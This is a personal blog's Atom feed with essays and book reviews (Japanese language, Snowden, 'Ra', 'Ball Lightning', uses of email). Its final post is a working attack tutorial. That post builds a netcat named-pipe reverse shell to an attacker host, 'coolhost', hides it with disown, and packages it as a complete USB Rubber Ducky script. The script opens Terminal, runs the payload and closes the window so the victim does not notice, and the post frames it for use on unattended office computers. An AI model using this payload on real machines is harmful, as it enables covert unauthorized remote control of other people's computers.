<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="/feed.xml" rel="self" type="application/atom+xml" /><link href="/" rel="alternate" type="text/html" /><updated>2025-07-27T23:51:26+00:00</updated><id>/feed.xml</id><title type="html">zanneth.com</title><subtitle>personal website for zanneth</subtitle><entry><title type="html">Impermanence in Language</title><link href="/2024/11/18/impermanence-in-language.html" rel="alternate" type="text/html" title="Impermanence in Language" /><published>2024-11-18T07:00:00+00:00</published><updated>2024-11-18T07:00:00+00:00</updated><id>/2024/11/18/impermanence-in-language</id><content type="html" xml:base="/2024/11/18/impermanence-in-language.html"><![CDATA[<p>The Japanese language has a lot of fascinating cultural artifacts embedded within its grammar and
vocabulary. One such artifact that has always struck me was the unique and specific way that death
is conveyed in the language.</p>

<p>Verbs in Japanese, like in many other languages, are conjugated to modify their meaning or
grammatical function. The dictionary form of verbs are comprised of two parts: the base stem and the
suffix. Verb conjugation follows a pattern that is based on its suffix.</p>

<p>Example: 食べる (<em>taberu</em>) which means “to eat”. The base stem in this word is 食べ (<em>tabe</em>) while
the suffix is the syllable る (<em>ru</em>). Verbs in the same group that end in the る suffix are
conjugated according to the same pattern.</p>

<ul>
  <li>食べた (<em>tabeta</em>): ate (past tense)</li>
  <li>食べない (<em>tabenai</em>): not eat (negative)</li>
  <li>食べろう (<em>taberou</em>): let’s eat (volitional)</li>
</ul>

<p>And so on. There are nine different verb suffixes (e.g. く, ぐ, す, む) in Japanese and speakers of
the language must memorize the conjugation patterns for each.</p>

<p>One of these verbs is special: 死ぬ (<em>shinu</em>) “to die.”</p>

<p>死ぬ is the only verb in the entire Japanese vocabulary that ends in the ぬ (<em>nu</em>) suffix. Therefore
an entirely specific pattern of conjugation exists specifically for this word.</p>

<ul>
  <li>死んだ (<em>shinda</em>): died (past tense)</li>
  <li>死なない (<em>shinanai</em>): don’t die (negative)</li>
  <li>死のう (<em>shinou</em>): let’s die (volitional)</li>
</ul>

<p>There are about twenty more conjugation forms besides these (e.g. polite form, potential, passive,
causative, causative passive). That’s a lot of memorization for just one verb. And what an
interesting verb to specialize!</p>

<p>Is it just a coincidence that the verb meaning “to die” would have such unique grammatical
properties? There is another interesting example of specialization in the Japanese language, but
this time in its written form.</p>

<p>Written Japanese uses three different character sets: <em>hiragana</em>, <em>katakana</em>, and <em>kanji</em>. <em>Kanji</em>
is the most iconic of these character sets, originally adapted from Chinese, and is used to write
“content words” such as nouns and verb stems. There are about 3,000 <em>kanji</em> characters in Japanese
that must be memorized in order to, for example, read a newspaper.</p>

<p>One of the reasons why <em>kanji</em> is so difficult to memorize, especially for those who are learning
Japanese as a second language, is the multiple readings or pronunciations of the characters. Almost
all <em>kanji</em> characters have at least two different pronunciations: the <em>on-yomi</em> (original Chinese
pronunciation) and the <em>kun-yomi</em> (at least one Japanese pronunciation).</p>

<p>The character for “life” is 生 and has at least ten different readings, and is one of the most
versatile characters in the language.</p>

<p>The character for “death” was used earlier: 死. This character only has one pronunciation: し
(<em>shi</em>). 死 is highly unusual in that its Chinese and Japanese pronunciations share the same sound,
and therefore only has this one reading (many <em>kanji</em> have additional special readings in compound
words). It’s also only used in one verb: 死ぬ (to die).</p>

<p>It is likely not a coincidence that the concept of “death” was given such special treatment in the
cultivation of the Japanese language. Japanese philosophy has a concept called 物の哀れ (<em>mono no
aware</em>) which describes the gentle sadness or melancholy that is derived from the impermanence of
everyday life. Changing of seasons, fleeting relationships, the appreciation of old objects, and of
course the ephemeral nature of life itself are all different ways the sentiment manifests. What
better way to convey this sentiment than to embed it into the language itself.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[The Japanese language has a lot of fascinating cultural artifacts embedded within its grammar and vocabulary. One such artifact that has always struck me was the unique and specific way that death is conveyed in the language.]]></summary></entry><entry><title type="html">“Permanent Record” Review</title><link href="/2021/08/27/permanent-record-review.html" rel="alternate" type="text/html" title="“Permanent Record” Review" /><published>2021-08-27T21:00:00+00:00</published><updated>2021-08-27T21:00:00+00:00</updated><id>/2021/08/27/permanent-record-review</id><content type="html" xml:base="/2021/08/27/permanent-record-review.html"><![CDATA[<p>Internet privacy is under threat more than ever. Authoritarian governments are
demanding more access to citizens’ private information. Advertising companies
are inventing increasingly clever ways to collect more data to build a profile
for targeting. Even Apple, once the vanguard of data privacy and security,
recently announced a feature that will scan users’ photos to search for
so-called child abuse material.</p>

<p><em>Permanent Record</em> is an autobiography written by Edward Snowden, the infamous
NSA whistleblower who leaked classified information about U.S. government
surveillance programs. Snowden as it turns out, had a life that is not too
dissimilar from my own. Growing up online in the late nineties/early naughts,
becoming interested in computers at a young age, and watching Japanese anime
while studying the language were all familiar character elements, not just for
myself but for a lot of other “computer guys” that I know. The humanizing
element of this story elicits a stark contrast with the serious and
wide-reaching impact of Snowden’s revelations to the world.</p>

<p>Besides being relatable, <em>Permanent Record</em> was also a great introduction to
general life as a member of the Intelligence Community (IC). The language used
by this community is populated with a vexing array of three-letter acronyms and
ad-hoc codenames (NSA, TSC, SOLARWIND, etc.) Beneath all of this vocabulary are
information systems not unlike what is being developed every day in Silicon
Valley and elsewhere. Even the scale of some of these systems probably does not
compare to that of those developed by Facebook or Google. Aside from these
similarities, I enjoyed reading about the differences in how government agencies
operate in the technology world compared to private industry.</p>

<p>Snowden did a lot of important work instructing journalists about how to use
technology to communicate securely. Journalists constantly have to exchange
information about important stories but most of them do not understand how to
use their tools effectively. Therefore one of the most interesting parts of the
story was when Snowden chose to instruct Glenn Greenwald, Laura Poitras, and
others on how to use encrypted email (PGP) and how to safely store the documents
that he shared to them. This was certainly a defining strategy for
whistleblowers at the time.</p>

<p><em>Permanent Record</em> contains an excellent record of the abuses on privacy
perpetrated by the U.S. government as well as other members of the Five Eyes
intelligence community. However, I would have liked to see more information
written about the dangers behind the work being done by private companies like
the social media tech giants in what is now being described as “surveillance
capitalism.” Of course Snowden’s expertise is in government work, not private
industry, so the reason for this omission is clear. Despite that, the amount of
information collected by private tech companies who are held accountable by
shareholders as opposed to democratically-elected officials is equally egregious
and even less under the control of normal citizens.</p>

<p>Anyone who is remotely interested in online privacy or computer security should
read <em>Permanent Record</em>. Whether you believe that Snowden is a traitor or a
patriot, it is important to understand why such a young and intelligent man
would give up his entire life and career to pursue a goal that he believed to be
in the interest of public good. After reading the book, I truly believe that
that was the case. I do think that there may have been more responsible ways to
raise concerns about the systems being developed and to disclose information
about them, but I also know what it is like to work in a gargantuan bureaucratic
organization that is ignorant towards the overall impact of their work.
Nevertheless, society must continue to uphold the values of individualism and
purposeful work in order to march responsibly towards a more private and secure
future.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Internet privacy is under threat more than ever. Authoritarian governments are demanding more access to citizens’ private information. Advertising companies are inventing increasingly clever ways to collect more data to build a profile for targeting. Even Apple, once the vanguard of data privacy and security, recently announced a feature that will scan users’ photos to search for so-called child abuse material.]]></summary></entry><entry><title type="html">Surprising Uses of Email</title><link href="/2020/12/29/surprising-uses-of-email.html" rel="alternate" type="text/html" title="Surprising Uses of Email" /><published>2020-12-29T07:00:00+00:00</published><updated>2020-12-29T07:00:00+00:00</updated><id>/2020/12/29/surprising-uses-of-email</id><content type="html" xml:base="/2020/12/29/surprising-uses-of-email.html"><![CDATA[<p>Email is a powerful tool that is an inextricable part of everyone’s lives.
Despite countless valiant efforts to kill it and replace it with something
better, email continues to live on in more or less the same form it has had
since the 1990s. Technology that endures this long deserves a fair amount of
attention and praise.</p>

<p>There are two main reasons why email continues to be useful today. It is simple
to use, and it is not owned or controlled by a single company. Every attempted
replacement has failed at excelling in either one or both of those qualities.
Simple tools can often be extended in ways that the original authors never could
have imagined in the beginning. And because users are in control of the core
functionality, new use cases can be explored completely independently.</p>

<p>Computer users have a tendency to over-generalize when solving problems. In
other words, when all you have is a hammer, everything looks like a nail. In
this post, we are going to be looking at a lot of nails that can probably be
hammered down with email. At a fundamental level, email clients are tools
designed for storing and retrieving sequences of messages which can contain
arbitrary data. Looking at it this way, it is not difficult to imagine a variety
of use cases that can be accomplished with minimal amounts of scripting.</p>

<p>I do seriously think that email is a solid tool for a lot of these purposes, and
in fact use it as such for a few of these purposes every day. However, the main
purpose of this post is exploration, not general advice.</p>

<h2 id="to-do-list-one-that-you-actually-check">To-Do List (One That You Actually Check)</h2>

<p><img src="/assets/post-assets/email/todo-list.png" alt="To-Do List" /></p>

<p>The first use case is pretty obvious, and it is one that likely a large number of
people already employ on a daily basis.</p>

<p>By far the single most important productivity discovery that I made in my life
is <a href="http://www.43folders.com/2006/01/04/email-dmz">Inbox Zero</a>. Inbox Zero is
the simple idea that your email inbox should contain only a list of messages
that require some sort of action. Once the action associated with those messages
is completed, the message is archived or moved to a different folder. I have
been using Inbox Zero for years now and I rarely forget to do anything
important after integrating it into my life.</p>

<p>Need to remember to pack for your flight next week? You probably already got a
confirmation about your reservation in your email. Leave it in your inbox until
you are finished preparing for your trip, and archive it when you are done.</p>

<p>How about one-off reminders that are not associated with messages already in
your inbox? Just send an email to yourself with the action item in the subject
line. Use the body of the message to write down any notes you want, and reply to
the message to keep a record of additional notes if you need them.</p>

<p>What about periodic reminders that repeat on some interval, like reminding
yourself to pay a bill on time every month? Write a simple script that sends you
an email about it and schedule it to run once a month. At the end of each month,
you will have a new to-do item in your inbox with an actionable task in the
subject line.</p>

<p>The great part about using email as a to-do list is that you are already
checking it with some degree of regularity. Smartphone apps or web-based to-do
lists quickly lose their value the moment users lose interest or switch to using
something else. They also frequently become buggy or overburdened with features
that don’t add any value. This will never be a problem with email because you
can always use your favorite client as long as it continues to work with the
standard protocols. Syncing across multiple devices is a given, since your email
is already doing this.</p>

<h2 id="news-reader">News Reader</h2>

<p><img src="/assets/post-assets/email/rss2email.png" alt="RSS" /></p>

<p>RSS is a really elegant and simple way to subscribe to a feed of updates from
your favorite websites. Since the early 2000s, RSS has been integrated into a
lot of different services all across the net, and serves as the foundation for a
variety of different web-based content platforms such as podcasts.</p>

<p>In order to actually use RSS, you need a client that is capable of aggregating
entries from multiple different feeds and displaying them in some manner.
Managing a list of entries, tracking read or unread state, and displaying HTML
content is exactly what every email client is already good at doing.</p>

<p>I like using <a href="https://github.com/rss2email/rss2email">rss2email</a> for this.
rss2email delivers stories from my feeds into a special mailbox on my email
server that I check approximately every morning. Since the end result is just
IMAP messages stored on my email server, I can read them using my favorite
email client on whatever device I happen to be using that day.</p>

<h2 id="updating-your-website-or-social-media-accounts">Updating Your Website or Social Media Accounts</h2>

<p><img src="/assets/post-assets/email/update-blog.png" alt="Updating a Blog" /></p>

<p>Setting up a frictionless workflow for updating your personal website can be
rather difficult, especially if you want to be able to do it while on-the-go and
away from your usual workstation.</p>

<p>If you are maintaining a blog on a personal website or for a business, the focus
should primarily be on the content itself and not on writing markup, updating a
source control repository, or publishing static content to a file server or
database. At the end of the day, you want to be able to write your content in a
message and send it to your server to publish.</p>

<p>Writing rich-text or plain-text content, saving drafts, and publishing that
content to a server is the perfect job for an email client. Your email client
can even allow including inline images sent as attachments, or links that point
to other websites. Once you are done writing your post, send it to a special
email address that activates a script on the other end to convert your email
message into a blog post. <a href="https://www.gnupg.org/gph/en/manual/x135.html">PGP</a>
can be used by both the client and the server to ensure that it is actually you
who is authoring the blog post and not someone else. Forget about OAuth or
anything more complicated than that.</p>

<p>Social media feeds can be updated in a similar manner. All of your server-side
functionality can be multiplexed using different email addresses for each
service. For example, you can use <code class="language-plaintext highlighter-rouge">blog@mydomain.com</code> to send updates to your
blog, and <code class="language-plaintext highlighter-rouge">mastodon@mydomain.com</code> to publish toots on your
<a href="https://joinmastodon.org/">Mastodon</a> account. Writing the code for this is a
breeze, since your favorite programming language already has libraries for
dealing with SMTP and IMAP.</p>

<h2 id="a-user-interface-to-a-search-engine-or-database">A User Interface to a Search Engine or Database</h2>

<p>It’s pretty simple to build an API for a web service these days. However,
choosing the right library or designing the right API can sometimes be an
unnecessary burden when working on a personal project that only has one or two
users.</p>

<p>Email can be used as an interface between a user and a web service when the
input and output are simple enough.</p>

<p>For example, imagine that you have a file server with a large amount of photos
stored on it and you want to be able to search those photos and retrieve them at
random. The server could use machine learning libraries such as Tensorflow to
categorize the photos and attach metadata on them.</p>

<p>Instead of building a custom web-based user interface for this, you could use
email instead. The user sends an email with the search term in the subject line,
such as “pizza”, to a special email address that corresponds to the file server
containing the photos. Just like in the previous example, PGP or S-MIME can be
used as an authentication mechanism to ensure that only authorized users can
access the photos being requested. Once the server has collected a search
result, it replies to the query email with matching photos attached as MIME
parts. The email server keeps a record of previous queries, along with their
returned results as replies, in an easily displayable and searchable format.</p>

<h2 id="the-only-limit-is-your-imagination">The Only Limit is Your Imagination</h2>

<p>Connecting email accounts to small shell scripts is a simple but powerful
concept that can unlock a wide variety of different applications. You can build
these apps with the comforting knowledge that they are all based on federated
and robust protocols used by hundreds of different email clients which have
stood the test of time.</p>

<p>Using the rich text editing features of your email client, combined with a
hierarchical organization system based on folders, allows you to do a lot of
tasks that have previously been accomplished using buggy and monolithic tools.
Privacy and security issues that plague web-based tools can be effectively
avoided when using email, because you are in control of both the client and
the server. You also get syncing to multiple devices for free, since IMAP was
designed to facilitate managing email from multiple clients at once since the
beginning.</p>

<p>I’m always interested in learning about new uses of email. If you know about
some of these yourself, send me an email about them.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Email is a powerful tool that is an inextricable part of everyone’s lives. Despite countless valiant efforts to kill it and replace it with something better, email continues to live on in more or less the same form it has had since the 1990s. Technology that endures this long deserves a fair amount of attention and praise.]]></summary></entry><entry><title type="html">“Ra” Review</title><link href="/2020/05/02/ra-review.html" rel="alternate" type="text/html" title="“Ra” Review" /><published>2020-05-02T03:00:00+00:00</published><updated>2020-05-02T03:00:00+00:00</updated><id>/2020/05/02/ra-review</id><content type="html" xml:base="/2020/05/02/ra-review.html"><![CDATA[<p>Science fiction started to become significantly more interesting after the general public developed into a more scientifically educated population. The idea of “magic” in pre-1980’s science fiction, as it was written by famous authors such as Piers Anthony or Jules Verne, was relegated more on the fantasy end of the spectrum, and reading a novel from this era requires more effort while attempting to suspend disbelief.</p>

<p>In the 2014 novel written by Sam Hughes, <em>Ra</em> depicts a world where magic is as real as particle physics or organic chemistry. In this alternate present, scholars study the use and effects of magic in their world, and apply it to engineering pursuits for purposes such as harvesting energy or traveling into space. “Mages” as they are called conduct magic by vocalizing sequences of words belonging to no particular human language that exists, much like spells in fantasy fiction and not unlike statements in a computer programming language. Mystery begins to unfold as these scholars attempt to unravel the origin and the meaning of the various incantations necessary for practicing magic.</p>

<p>The setting alternates between what we perceive as reality in this alternate 21st century, a shared dream that is possible to visit at will, and a computerized virtual reality later in the story. The shared dream setting, called “Tanako’s World” in the book, is particularly interesting since no physical laws appear to apply, and the characters interact within this setting in very strange and inexplicable ways. It’s quite confusing to follow the various characters throughout these various settings, but the story does a decent job in elaborating on these various settings without the need to break the fourth wall as the book reaches its conclusion.</p>

<p>The story begins with some predictable and straightforward world building and character development, then gradually becomes more technical and unusual as the storyline progresses. The alternate present in which most of the book takes place is relatively easy to understand in the beginning, so are the various characters’ intentions and actions. However, in the later chapters this takes quite a turn and the story becomes a much more bizarre and complex. By the end, it’s hard to believe the events are taking place in the same world that was constructed in the beginning.</p>

<p>Character development in <em>Ra</em> leaves a bit to be desired. The two main characters, sisters named Laura and Natalie Ferno, have a clear and interesting dynamic in the beginning of the story where they appear to have a competitive but caring relationship with each other. However, it doesn’t evolve much beyond this, and their various intentions throughout the storyline are often unpredictable and unrelatable based on the events early on in the story. Other characters that are introduced later have weak and tenuous relationships with the main characters with very little background explanation.</p>

<p>Overall <em>Ra</em> is a fantastic book for anyone who is a fan of modern science fiction with a techno-futuristic spin. Despite the suitable amount of scientific justification supporting the story, it is more on the “soft” end of the spectrum for modern sci-fi, but enjoyable nonetheless. It’s available to read for free <a href="https://qntm.org/ra">on the web</a>.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Science fiction started to become significantly more interesting after the general public developed into a more scientifically educated population. The idea of “magic” in pre-1980’s science fiction, as it was written by famous authors such as Piers Anthony or Jules Verne, was relegated more on the fantasy end of the spectrum, and reading a novel from this era requires more effort while attempting to suspend disbelief.]]></summary></entry><entry><title type="html">“Ball Lightning” Review</title><link href="/2019/11/13/ball-lightning.html" rel="alternate" type="text/html" title="“Ball Lightning” Review" /><published>2019-11-13T06:00:00+00:00</published><updated>2019-11-13T06:00:00+00:00</updated><id>/2019/11/13/ball-lightning</id><content type="html" xml:base="/2019/11/13/ball-lightning.html"><![CDATA[<p>My first introduction to Chinese science-fiction was probably similar to a lot
of Western readers, which was reading Cixin Liu’s <em>The Three Body Problem</em> novel
back when its English translation was first published back in 2014. <em>Three Body</em>
completely blew me away, with its masterful storytelling and biblical-sounding
prose. After reading the first book, I had an insatiable appetite for more
sci-fi with the same ultra high-tech, militaristic style that was present in
<em>Three Body</em>, and devoured the rest of the <em>Remembrance of Earth’s Past</em> trilogy
with great excitement.</p>

<p>In September I had the opportunity to read the newly-translated <em>Ball Lightning</em>
by the same author while travelling. <em>Ball Lightning</em> was released a few years
earlier than <em>The Three Body Problem</em> in China, but its English translation only
became available in late 2018. <em>Ball Lightning</em> was translated by Joel
Martinsen, which I was pleased to discover since I very much enjoyed his English
translation of <em>The Dark Forest</em>, my favorite novel in the trilogy.</p>

<p>The story follows the early adult life of a man named Chen, who witnessed both
of his parents evaporate after ball lightning entered his family home
inexplicably one night. Chen’s traumatic experience set him firmly on a path
toward researching ball lightning, which is a real electrical phenomenon that
has no verifiable scientific explanations, as well as various other strange
events that occurred after the initial incident.</p>

<p>I had some initial difficulty with suspending disbelief while reading <em>Ball
Lightning</em>, and was a little repulsed by the Hollywood-level absurdity of the
initial events that set forth the plot of the book. However, as I continued
reading I discovered that the same masterful prose used in <em>Three Body</em> was
present in the chapters of <em>Ball Lightning</em>, and I was completely hooked after
only a couple of pages.</p>

<p>Chen dedicates a majority of his working and personal life to the pursuit of
studying the atmospheric phenomenon that killed his parents, and there is an
overarching theme about obsession and devotion to work present throughout the
novel. Characters who have this kind of fanatic obsession with something are
usually my favorite, both in fictional and non-fictional stories. After
countless failures in attempting experimental analysis of ball lightning, Chen
begins to lose hope until his next discovery reveals new information about the
phenomenon.</p>

<p>Chen eventually meets Lin Yun, a PLA officer who works on experimental weapons,
who shares a similar interest in the ball lightning phenomenon. Lin Yun is a
fascinating character who came from a mostly military background and has a
terrifying obsession with weapons and warfare. One of the most memorable parts
of the novel described a car ornament swinging from Lin Yun’s rear-view mirror
that looked like a piece of bamboo, but was actually a deadly landmine. Liu
describes how it is possible to separate the beauty of an object from its
originally designed purpose, which is to kill people, and appreciate both in
different ways.</p>

<p>Overall I tremendously enjoyed <em>Ball Lightning</em>. Just like the <em>Three Body</em>
trilogy, there was a coherent mixture of science-fiction and science non-fiction
that served as a backdrop to a fascinating story, while also being educational
and thought-provoking. After reading the conclusion I couldn’t help but ponder
about what sort of advanced weapon could mean the existential end for humanity
as a whole. However, there was enough optimism about the scientific method
written in the story that served as an adequate distraction from the more
daunting elements.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[My first introduction to Chinese science-fiction was probably similar to a lot of Western readers, which was reading Cixin Liu’s The Three Body Problem novel back when its English translation was first published back in 2014. Three Body completely blew me away, with its masterful storytelling and biblical-sounding prose. After reading the first book, I had an insatiable appetite for more sci-fi with the same ultra high-tech, militaristic style that was present in Three Body, and devoured the rest of the Remembrance of Earth’s Past trilogy with great excitement.]]></summary></entry><entry><title type="html">Reverse Shell with USB Rubber Ducky</title><link href="/2019/04/15/reverse-shell-with-rubber-ducky.html" rel="alternate" type="text/html" title="Reverse Shell with USB Rubber Ducky" /><published>2019-04-15T03:00:00+00:00</published><updated>2019-04-15T03:00:00+00:00</updated><id>/2019/04/15/reverse-shell-with-rubber-ducky</id><content type="html" xml:base="/2019/04/15/reverse-shell-with-rubber-ducky.html"><![CDATA[<p>I just bought this tiny USB microcontroller called the <a href="https://shop.hak5.org/products/usb-rubber-ducky-deluxe">USB Rubber
Ducky</a> from Hak5. It’s a
really nifty piece of hardware that acts like a USB keyboard when plugged into a
computer. Since it’s totally programmable, you can use the Rubber Ducky to type
in whatever you want into the host machine as soon as it is plugged in.</p>

<p><img src="/assets/post-assets/rubber-ducky/rubber-ducky-packaging.jpg" alt="Rubber Ducky" /></p>

<p>The Rubber Ducky is really useful for penetration testing, and in fact
pen-testers have been using a similar technique with devices such as the
<a href="https://www.pjrc.com/teensy/">Teensy</a> or Arduino for a while now. The neat
thing about the Rubber Ducky is that it uses a
<a href="https://en.wikipedia.org/wiki/Domain-specific_language">DSL</a> called <a href="https://docs.hak5.org/hc/en-us/articles/360010555153-Ducky-Script-the-USB-Rubber-Ducky-language">Ducky
Script</a>
to make the process of automating keyboard input extremely easy.</p>

<p>For example, let’s say that I have a macOS desktop and I want the Rubber Ducky
to automatically launch the TextEdit app and type “Cyber World” into a document.
Here is what the Ducky Script would look like to accomplish this task.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REM Launch TextEdit.app and type something

GUI SPACE
STRING textedit
ENTER

DELAY 500

GUI n

STRING Cyber World
</code></pre></div></div>

<p>Ducky Script divides each line into two parts: a command, and all of its
arguments. Commands can also be modifier keys, which are useful for executing
keyboard shortcuts on the host machine.</p>

<p>The first line is simply a comment. Any line starting with <code class="language-plaintext highlighter-rouge">REM</code> is treated as a
comment and ignored by the interpreter.</p>

<p>The second line asks the device to hold down the Command key and press the space
bar. On macOS desktops, this is invokes the Spotlight modal interface, which
offers a quick and easy way to launch applications.</p>

<p>The third line uses the most important command in Ducky Script, the <code class="language-plaintext highlighter-rouge">STRING</code>
command, which causes the device to type whatever you write on the right-hand
side. The only thing this third line does is type “textedit” into the Spotlight
UI.</p>

<p>The <code class="language-plaintext highlighter-rouge">ENTER</code> command is pretty self-explanatory. This presses the enter key on
the host system.</p>

<p>The fifth line is important, and shows an unfortunate drawback to using this
kind of device as a automated control mechanism. Since TextEdit takes a little
while to actually launch and become foregrounded, we have to pause execution on
the Rubber Ducky so that it doesn’t move onto the next command before the host
machine is ready. This line waits 500 milliseconds before continuing.</p>

<p>The sixth line asks TextEdit to create a new document by pressing Command-N on
the keyboard. TextEdit does not create a new document by default. Instead it
shows the open dialog with the option to create a new document or open an
existing one on the filesystem.</p>

<p>Finally the last line uses the same <code class="language-plaintext highlighter-rouge">STRING</code> command we used earlier to type the
text “Cyber World” into the TextEdit window.</p>

<p>Though this example essentially does something completely useless, it’s easy to
see what kind of neat applications can be created using the Rubber Ducky. There
are some fun pranks that can be developed using this, such as using the keyboard
to invert the colors on someone’s screen, or magnifying all of the text multiple
times.</p>

<p>I had a slightly more sinister use case in mind for this however.</p>

<p>Office workers notoriously have pretty bad operational security while using
their computers in an open office setting. This is not mostly due to stupidity,
but rather they assume that because their machines are behind locked doors or in
a building with a lot of surveillance that nobody will walk up and do anything
malicious.</p>

<p>What if there was a magical USB device that would automatically let me open a
remote shell from my server?</p>

<p>We have to be a little creative here because we can’t make very many assumptions
about what kind of programs are installed on the victim’s machine. For this
exercise, let’s assume that the machine is running macOS, which means it has
basic BSD and UNIX utilities like <code class="language-plaintext highlighter-rouge">netcat</code> and <code class="language-plaintext highlighter-rouge">sh</code>.</p>

<p>Reading the manpages for <code class="language-plaintext highlighter-rouge">netcat</code> turn up two pretty interesting options: <code class="language-plaintext highlighter-rouge">-e</code>
and <code class="language-plaintext highlighter-rouge">-c</code>, both of which allow us to execute a shell command immediately after
connecting. This sounds like exactly what we want. We can just connect to a
remote server that is listening on some port and use the <code class="language-plaintext highlighter-rouge">-c</code> option to start a
remote shell on the victim machine.</p>

<p>Unfortunately (fortunately?) we weren’t the only ones to think of using this
option as an attack vector. Most UNIX distributions (macOS included) disable
both of these options because they open the machine to <a href="https://serverfault.com/questions/237584/netcat-e-the-gaping-security-hole">gaping security
holes</a>.
OS engineers always have to ruin the fun…</p>

<p>Turns out this isn’t too big of a deal, because we can use other ways to
redirect input and output from our remote shell.</p>

<p>Another way to do this is to use one of my favorite UNIX features called <a href="https://en.wikipedia.org/wiki/Named_pipe">named
pipes</a>. Named pipes are not any
different from regular pipes, except the only difference is that they are files
that are accessible via the file system.</p>

<p>Making a named pipe on any UNIX system is as simple as running the <code class="language-plaintext highlighter-rouge">mkfifo</code>
command and specifying where we want the named pipe to be stored on the
filesystem.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mkfifo /tmp/mypipe
</code></pre></div></div>

<p>This command creates a named pipe and stores it at the path <code class="language-plaintext highlighter-rouge">/tmp/mypipe</code>. To
read data from this pipe, we can use any program we like for reading a file’s
contents (e.g. <code class="language-plaintext highlighter-rouge">cat</code>). Writing to it is just as simple as using any program that
can write output to a file. All reading and writing is done in a blocking and
synchronous manner just like other kinds of pipes.</p>

<p>Named pipes are a useful way to do inter-process communication. For our
purposes, we can use it to start one process that executes commands and another
process that reads data over a TCP socket, and use the named pipe to connect
these two together.</p>

<p>My first attempt at this was to read data from this named pipe and pipe this
into an instance of <code class="language-plaintext highlighter-rouge">sh</code> running with the <code class="language-plaintext highlighter-rouge">-i</code> option. The <code class="language-plaintext highlighter-rouge">-i</code> option specifies
that the shell is running in an interactive mode and input/output are attached
to a terminal. After this, we use the <code class="language-plaintext highlighter-rouge">netcat</code> command to open a TCP socket to
our server (again called <code class="language-plaintext highlighter-rouge">coolhost</code>) and redirect its output to our named pipe
so that it can talk to the shell. This effectively allows us to spawn a shell
and redirect all input and output over a TCP socket, using a port number of our
choice. (I used port number 5730 for this example.)</p>

<p>On the server, we start a listener by running the following command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -l -p 5730
</code></pre></div></div>

<p>On the victim’s machine (the client), we run this command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cat /tmp/mypipe | sh -i 2&gt;&amp;1 | nc coolhost 5730 &gt; /tmp/mypipe &amp;
</code></pre></div></div>

<p>Annoyingly the parent shell doesn’t let this command start without suspending it
immediately.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[1]  + suspended (tty input)  cat /tmp/mypipe | sh -i
</code></pre></div></div>

<p>This is because the <code class="language-plaintext highlighter-rouge">sh -i</code> command begins reading input from the tty right
after starting, and the shell assumes that this will be a deadlock while running
in the background, so it suspends the process instead. This is no good because
we need the shell to start in the background so that we can close the terminal
window without the victim noticing.</p>

<p>Instead, let’s omit the interactive option and spawn <code class="language-plaintext highlighter-rouge">sh</code> using raw input and
output.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cat /tmp/mypipe | sh /dev/stdin 2&gt;&amp;1 | nc coolhost 5730 &gt; /tmp/mypipe &amp;
</code></pre></div></div>

<p>On the server where we started the listener, we can now issue shell commands and
read the output simply by typing in characters and pressing return.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>whoami
zanneth

ls /
Applications              System                    etc                       tmp
Groups                    Users                     home                      usr
...
</code></pre></div></div>

<p>The slight drawback to not using the <code class="language-plaintext highlighter-rouge">-i</code> option is that we don’t get a shell
prompt on the remote server. The only way we know it’s working is by typing
commands and seeing if we get output back from the victim’s machine.</p>

<p>We’re almost done with our payload. There is one remaining problem which is that
the shell process we start will be terminated as soon as we close the terminal
window because the shell started as a background job. The easy fix for this is
to simply run the <code class="language-plaintext highlighter-rouge">disown</code> command at the end, which tells the shell to not send
a <code class="language-plaintext highlighter-rouge">SIGHUP</code> to job processes when the parent shell receives it.</p>

<p>Our final payload line is the following:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cat /tmp/mypipe | /bin/sh /dev/stdin 2&gt;&amp;1 | nc coolhost 5730 &gt; /tmp/mypipe &amp; disown
</code></pre></div></div>

<p><img src="/assets/post-assets/rubber-ducky/rubber-ducky-plugged-in.jpg" alt="Rubber Ducky Plugged In" /></p>

<p>The hardest part of our research is done. Now the only thing we have to do is
write the super fun Rubber Ducky script to type this into a terminal as soon as
it is plugged into a machine.</p>

<p>Here is the script I wrote with comments (starting with <code class="language-plaintext highlighter-rouge">REM</code>) explaining each
part.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REM Press Command+Space to bring up Spotlight, wait 100 msec.
GUI SPACE
DELAY 100

REM Type 'terminal' into Spotlight and press return.
STRING terminal
DELAY 100
ENTER

REM Wait for terminal to finish launching.
DELAY 500

REM Delete our fifo file in case something's already there.
STRING rm -f /tmp/mypipe
ENTER

REM Create the named pipe.
STRING mkfifo /tmp/mypipe
ENTER

REM Run our payload to pop a shell and connect to the attacker's remote server.
STRING cat /tmp/mypipe | /bin/sh /dev/stdin 2&gt;&amp;1 | nc coolhost 5730 &gt; /tmp/mypipe &amp; disown
ENTER

REM Close the terminal window.
STRING exit
ENTER
</code></pre></div></div>

<p>That’s it for our Rubber Ducky script. Now we just have to encode this and store
it on the Rubber Ducky’s flash memory, and it will run as soon as we plug it
into a computer.</p>

<p>There is one more refinement I wanted make to this process. I didn’t like that I
had to manually start a <code class="language-plaintext highlighter-rouge">netcat</code> listener on my server every time before
plugging the Rubber Ducky into the victim’s system. I decided to use the
<code class="language-plaintext highlighter-rouge">screen</code> command on my server to park the listener, using the <code class="language-plaintext highlighter-rouge">-DmS</code> option to
start it as a daemon without forking.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>screen -DmS hax0r.tty /bin/nc -l -p 5730
</code></pre></div></div>

